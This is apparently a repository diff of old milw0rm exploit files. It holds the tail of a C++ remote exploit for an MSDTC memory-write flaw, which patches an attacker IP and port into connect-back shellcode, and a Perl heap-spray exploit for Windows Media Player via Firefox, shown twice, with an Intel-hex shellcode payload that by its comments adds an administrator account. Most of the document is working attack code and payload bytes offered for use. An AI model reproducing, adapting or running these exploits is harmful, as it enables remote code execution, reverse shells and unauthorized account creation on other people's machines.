"\x14\xDE\x89\xC9\xCF\xAA\x59\xC9\xC9\xC9\xF3\x98\xC9\xC9\x14\xCE"
"\xA5\x5E\x9B\xFA\xF4\xFD\x99\xCB\xC9\x66\xCE\x75\x5E\x9E\x9B\x99"
"\x9E\x24\x5E\xDE\x9D\xE6\x99\x99\x98\xF3\x89\xCE\xCA\x66\xCE\x65"
"\xC9\x66\xCE\x69\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66"
"\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x9E\x66\x66\x66\xDE\xFC"
"\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC"
"\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED"
"\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB"
"\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA"
"\xF6\xFA\xF2\xFC\xED\xD8\x99\xFA\xF6\xF7\xF7\xFC\xFA\xED\x99";
struct ostype
{
DWORD TopSEH;
char description[255];
};
ostype OS[] = {
{0x684191c4, "Write NdrserverCall2 pointer From 0x990058"},
{0x684191c4, "Write NdrserverCall2 pointer From 0x980058"},
{0, NULL}
};
DWORD BaseImage[]={0x990058, 0x980058};
void MakeShell(char *ip, int port)
{
//make shellcode
unsigned short tp = htons(port)^(u_short)0x9999;
unsigned long ti = inet_addr(ip)^0x99999999;
memcpy(&realsc[port_offset], &tp, 2);
memcpy(&realsc[ip_offset], &ti, 4);
}
SOCKET ConnectTo(char *ip, int port)
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int nTimeout = 5000;
if(WSAStartup(0x0101,&wsaData) != 0)
{
printf("error starting winsock..");
exit(-1);
}
if((he = gethostbyname(ip)) == 0)
{
printf("Failed resolving '%s'", ip);
exit(-1);
}
host.sin_port = htons(port);
host.sin_family = AF_INET;
host.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("Failed creating socket");
exit(-1);
}
if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1)
{
printf("Failed connecting to host\r\n");
exit(-1);
}
setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char*)&nTimeout,sizeof(nTimeout));
return s;
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
void WriteFakeLength(DWORD fakelen) //should > 0x22b
{
*(DWORD*)(peer0_1+15*8) = fakelen/2;
}
void BuildShell(char *ip, int port)
{
MakeShell(ip, port);
memcpy(peer0_1 + 132, realsc, sizeof(realsc));
}
void BuildContext(char*ip, int port)
{
SOCKET s = ConnectTo(ip, port);
//SOCKET s = ConnectTo("202.119.9.191", 2288);
send(s, peer0_0, sizeof(peer0_0), 0);
char buf[5000];
WriteFakeLength(1200);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
memset(buf, 0, sizeof(buf));
recv(s, buf, sizeof(buf), 0);
Disconnect(s);
if(buf[8] != 0x5c)
{
printf("Target not support! Quiting....");
exit(0);
}
Sleep(500);
}
void help(char *n)
{
printf("-=[ SST ]=------------------------------------\n");
printf(" MSDTC Arbitrary Opposite Memory Write Flaw\n");
printf("----------------------------------------------\n");
printf("Usage:\n");
printf(" %s [Taget IP] [Target Port] [Your IP] [Your Port] <type>\n\ntype:\n", n);
int i=0;
while(OS[i].TopSEH)
{
printf(" %d %s\n", i, OS[i].description);
i++;
}
}
void main(int argc, char *argv[])
{
if(argc < 5)
{
help(argv[0]);
return;
}
int itype = 0;
int b = 0;
if(argc == 5)
b = atoi(argv[5]);
char *ip = argv[1];
int port = atoi(argv[2]);
printf("(^_^) Start exploiting journey!\n");
//build context, copy shellcode to heap
BuildContext(ip, port);
BuildContext(ip, port);
BuildContext(ip, port);
BuildShell(argv[3], atoi(argv[4]));
BuildContext(ip, port);
BuildContext(ip, port);
BuildContext(ip, port);
//finish building
printf("(^_^) Context built!\n");
SOCKET s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0);
char buf[5000];
WriteFakeLength(OS[itype].TopSEH-BaseImage[b]-4);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s);
printf("(^_^) Function pointer wrote!\n");
//trigger
printf("(*_*) Trigger fault...");
Sleep(500);
s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0);
//WriteFakeLength(0x80811102-BaseImage[b]-4);
WriteFakeLength(0x226);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s);
printf("Done!\n(*_*) Any shell?");
}
// milw0rm.com [2005-12-01]

242
platforms/windows/remote/1520.pl
View file

@ -1,121 +1,121 @@
#!/usr/bin/perl
#
# wmp-profiteer.pl
# Exploiting 'Non-Critical' Media Player Vulnerabilities for Fun and Profit
# By Matthew Murphy (mattmurphy@kc.rr.com)
#
# It's come to my attention that the HTML versions of the exploit posted on
# several sites have become mangled. Notables include SecuriTeam and FrSIRT.
# Neither one, though, can beat SecurityFocus, whose links to the exploits
# for this issue are both 404s.
#
# I haven't updated the underlying exploit methodology -- it's still a shameless
# rip of Skylined's heap spray technique, but now the shellcode can be
# customized!
#
# The usage of this tool is as follows:
#
# wmp-profiteer.pl [shellcode]
#
# The shellcode that comes with this has the same payload as the original.
# If it's successful against you, you'll have an administrator account named
# 'wmp0wn3d' with a password of 'password'. This, of course, assumes that
# you're running the vulnerable application as an administrator. There's a
# lesson in that: run as a Limited User or at least tie down your browsers
# with Software Restriction.
#
# This will drop 'wmp-exploit.html' in the current directory. When the HTML
# document is opened locally or viewed remotely by a vulnerable web browser
# (Firefox on Windows), the exploit code will run and gain control of the
# browser.
#
# The standard disclaimer from the original exploit still applies, with some
# changes:
#
# This exploit code is intended only as a demonstration tool for
# educational or testing purposes. It is not intended to be used for any
# unauthorized or illicit purpose. Any testing done with this tool OR ANY
# PRODUCT OR ALTERATION THEREOF must be limited to systems that you own or
# are explicitly authorized to test.
#
# By utilizing or possessing this code, you assume any and all
# responsibility for damage that results. The author will not be held
# responsible, under any circumstances, for damage that arises from your
# possession or use of this code.
$part1 =
"<!DOCTYPE HTML PUBLIC \"-//W3C DTD HTML 4.01 Transitional//EN\">
<HTML>
<HEAD>
<TITLE>WMP EMBED Exploit by Matthew Murphy</TITLE>
<SCRIPT>
var spray = unescape(\"%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141\");
do {
spray += spray;
} while (spray.length < 0x1000000);
spray += unescape(\"";
$part2 =
"\");
</SCRIPT>
</HEAD>
<BODY BGCOLOR=\"#FFFFFF\" TEXT=\"#000000\">
<EMBED SRC=\"";
$part3 =
"\"></EMBED>
</BODY>
</HTML>";
if (@ARGV != 1) {
print STDERR "Usage: $0 [shellcode file]";
}
open(EXPLOIT, ">./wmp-exploit.html") or die "Cannot open 'wmp-exploit.html for writing.";
print EXPLOIT $part1;
open(SHELLCODE, $ARGV[0]) or die "Shellcode file not found.";
while (!eof(SHELLCODE)) {
$ch1 = getc(SHELLCODE);
if (eof(SHELLCODE)) {
print EXPLOIT "%u00";
print EXPLOIT sprintf("%%u00%.2x", ord($ch1));
} else {
$ch2 = getc(SHELLCODE);
print EXPLOIT sprintf("%%u%.2x%.2x", ord($ch2), ord($ch1));
}
}
close(SHELLCODE);
print EXPLOIT $part2;
print EXPLOIT "-"x2038;
print EXPLOIT "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLL";
print EXPLOIT "AAA\x05";
print EXPLOIT "NNNNOOOO";
print EXPLOIT "AAA\x05";
print EXPLOIT "QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv";
print EXPLOIT $part3;
close(EXPLOIT);
----------------------------------------------- shellcode.hex -----------------------------------------
:020000040000FA
:100000002BC983E9C9D9EED97424F45B8173132118
:10001000C414F183EBFCE2F4DD2C50F121C49FB455
:100020001D4F68F459C5FB7A6EDC9FAE01C5FFB861
:10003000AAF09FF0CFF5D4688D40D4852605DEFC6C
:100040002006FF051A9030F554219FAE05C5FF9795
:10005000AAC85F7A7ED8151AAAD89FF0CA4D48D58B
:1000600025072531454F54C1A4046CFDAA84187A94
:1000700051D8B97A49CCFFF8AA44A4F121C49F9978
:100080001D9B250741929D09A2046FA149349EF54D
:100090007EAC8C0FABCA430EC6A779950FA16C94AA
:1000A00001EB77D14FA160D154B7718301B379814E
:1000B00011B37AC245E4649052B7639E53A034DE14
:1000C000608050D107E2349F44B0349D4EA7759DA7
:1000D00046B67B8451E455954CAD7A9852B0669003
:1000E00055AB668201B3798111B37AC245E43BB066
:0400F000658014F122
:00000001FF
# milw0rm.com [2006-02-22]
#!/usr/bin/perl
#
# wmp-profiteer.pl
# Exploiting 'Non-Critical' Media Player Vulnerabilities for Fun and Profit
# By Matthew Murphy (mattmurphy@kc.rr.com)
#
# It's come to my attention that the HTML versions of the exploit posted on
# several sites have become mangled. Notables include SecuriTeam and FrSIRT.
# Neither one, though, can beat SecurityFocus, whose links to the exploits
# for this issue are both 404s.
#
# I haven't updated the underlying exploit methodology -- it's still a shameless
# rip of Skylined's heap spray technique, but now the shellcode can be
# customized!
#
# The usage of this tool is as follows:
#
# wmp-profiteer.pl [shellcode]
#
# The shellcode that comes with this has the same payload as the original.
# If it's successful against you, you'll have an administrator account named
# 'wmp0wn3d' with a password of 'password'. This, of course, assumes that
# you're running the vulnerable application as an administrator. There's a
# lesson in that: run as a Limited User or at least tie down your browsers
# with Software Restriction.
#
# This will drop 'wmp-exploit.html' in the current directory. When the HTML
# document is opened locally or viewed remotely by a vulnerable web browser
# (Firefox on Windows), the exploit code will run and gain control of the
# browser.
#
# The standard disclaimer from the original exploit still applies, with some
# changes:
#
# This exploit code is intended only as a demonstration tool for
# educational or testing purposes. It is not intended to be used for any
# unauthorized or illicit purpose. Any testing done with this tool OR ANY
# PRODUCT OR ALTERATION THEREOF must be limited to systems that you own or
# are explicitly authorized to test.
#
# By utilizing or possessing this code, you assume any and all
# responsibility for damage that results. The author will not be held
# responsible, under any circumstances, for damage that arises from your
# possession or use of this code.
$part1 =
"<!DOCTYPE HTML PUBLIC \"-//W3C DTD HTML 4.01 Transitional//EN\">
<HTML>
<HEAD>
<TITLE>WMP EMBED Exploit by Matthew Murphy</TITLE>
<SCRIPT>
var spray = unescape(\"%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141\");
do {
spray += spray;
} while (spray.length < 0x1000000);
spray += unescape(\"";
$part2 =
"\");
</SCRIPT>
</HEAD>
<BODY BGCOLOR=\"#FFFFFF\" TEXT=\"#000000\">
<EMBED SRC=\"";
$part3 =
"\"></EMBED>
</BODY>
</HTML>";
if (@ARGV != 1) {
print STDERR "Usage: $0 [shellcode file]";
}
open(EXPLOIT, ">./wmp-exploit.html") or die "Cannot open 'wmp-exploit.html for writing.";
print EXPLOIT $part1;
open(SHELLCODE, $ARGV[0]) or die "Shellcode file not found.";
while (!eof(SHELLCODE)) {
$ch1 = getc(SHELLCODE);
if (eof(SHELLCODE)) {
print EXPLOIT "%u00";
print EXPLOIT sprintf("%%u00%.2x", ord($ch1));
} else {
$ch2 = getc(SHELLCODE);
print EXPLOIT sprintf("%%u%.2x%.2x", ord($ch2), ord($ch1));
}
}
close(SHELLCODE);
print EXPLOIT $part2;
print EXPLOIT "-"x2038;
print EXPLOIT "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLL";
print EXPLOIT "AAA\x05";
print EXPLOIT "NNNNOOOO";
print EXPLOIT "AAA\x05";
print EXPLOIT "QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv";
print EXPLOIT $part3;
close(EXPLOIT);
----------------------------------------------- shellcode.hex -----------------------------------------
:020000040000FA
:100000002BC983E9C9D9EED97424F45B8173132118
:10001000C414F183EBFCE2F4DD2C50F121C49FB455
:100020001D4F68F459C5FB7A6EDC9FAE01C5FFB861
:10003000AAF09FF0CFF5D4688D40D4852605DEFC6C
:100040002006FF051A9030F554219FAE05C5FF9795
:10005000AAC85F7A7ED8151AAAD89FF0CA4D48D58B
:1000600025072531454F54C1A4046CFDAA84187A94
:1000700051D8B97A49CCFFF8AA44A4F121C49F9978
:100080001D9B250741929D09A2046FA149349EF54D
:100090007EAC8C0FABCA430EC6A779950FA16C94AA
:1000A00001EB77D14FA160D154B7718301B379814E
:1000B00011B37AC245E4649052B7639E53A034DE14
:1000C000608050D107E2349F44B0349D4EA7759DA7
:1000D00046B67B8451E455954CAD7A9852B0669003
:1000E00055AB668201B3798111B37AC245E43BB066
:0400F000658014F122
:00000001FF
# milw0rm.com [2006-02-22]

6
platforms/windows/remote/765.c
View file

@ -225,6 +225,6 @@ main(int argc, char **argv)
fclose(fp);
return 0;
}
// milw0rm.com [2005-01-22]
}
// milw0rm.com [2005-01-22]

6
platforms/windows/remote/771.cpp
View file

@ -235,6 +235,6 @@ main(int argc, char **argv)
fclose(fp);
return 0;
}
// milw0rm.com [2005-01-24]
}
// milw0rm.com [2005-01-24]